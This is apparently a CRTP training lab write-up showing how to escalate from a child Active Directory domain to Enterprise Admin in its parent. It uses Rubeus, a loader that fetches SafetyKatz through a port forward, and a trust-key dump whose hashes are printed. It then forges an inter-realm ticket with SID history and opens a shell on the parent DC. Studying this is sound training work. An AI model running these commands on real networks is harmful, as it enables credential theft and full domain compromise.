CRTP Lab 18

Task

Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.

To extract the trust key between dollarcorp and moneycorp, we need to start a process with DA privs, copy loader to dcorp-dc, and use it to extract credentials.

# Start a DA process
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# Copy Loader to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Open dcorp-dc shell
winrs -r:dcorp-dc cmd

# Setup port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

We can use SafetyKatz to extract credentials.

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::trust /patch" "exit"



Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 6/11/2024 9:04:30 PM - CLEAR   - 6c 5c 5a 6f 92 82 4f 17 79 cb de 1d a0 33 e0 38 e8 a9 53 09 41 00 a5 84 da e2 3a fa 16 a6 47 8c 16 ac 9d 55 56 f8 22 51 80 7a 97 42 6a 18 34 72 47 50 6b ed 98 9c 3c 61 6e 11 6f 68 21 05 a1 d3 a0 eb ab a3 31 69 ed 75 c0 3c 54 49 cc a3 9a ef 0d c9 aa b2 af b1 5a c9 e3 dc d6 58 6c 6d 6c 1f 07 c5 bb c1 a9 be 61 ed 53 e1 9c a1 b8 bd 65 4b 0a a4 34 e9 6d ae 0a e3 60 2f 52 c0 02 67 a0 c8 b6 88 16 20 a1 31 06 6f 49 26 fd 2c d0 48 c6 70 3e 7d 18 eb 19 e1 17 c2 3b 0f 6e 23 5c 12 09 ce 1a 1b 43 69 9c 3b c7 ab 82 16 24 be d9 58 0a b5 c3 cd 5f 18 c1 7c 0e 25 75 36 6d 8d 32 e0 ee 92 58 3d 7d a9 8a 1a 21 1a c5 58 cc 4a 68 c7 53 ff 39 70 e1 8d 2b e5 3f 1e 3d 62 2b 4a 39 17 14 19 e3 14 62 a5 f9 7d ec 18 6a be 0f d0 7c 58 c4 a0
        * aes256_hmac       bce498af44bfa1a1aacfe367a7e421aeac474d647e41cada56ba25855ae9966c
        * aes128_hmac       2a2cd8447dea2f3a7ad2da6944a32f58
        * rc4_hmac_nt       2aa6fd0eec0369f316217d65bb808e50

Copy the rc4 hash. We can use it to forge the inter-realm TGT and injecting SID History of Enterprise Admins

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:2aa6fd0eec0369f316217d65bb808e50 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

Now using Rubeus, we can request a TGS. 

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3......

Finally, we can access CIFS of mcorp-dc.

winrs -r:mcorp-dc.moneycorp.local cmd


C:\Users\student372>winrs -r:mcorp-dc.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC

C:\Users\Administrator.dcorp>
PreviousUsing Trust TicketsNextUsing KRBTGT Hash

Last updated